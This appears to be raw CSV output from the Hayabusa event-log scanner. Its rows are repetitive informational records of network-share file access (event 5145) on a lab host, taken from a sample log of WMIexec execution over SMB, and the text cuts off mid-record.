10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
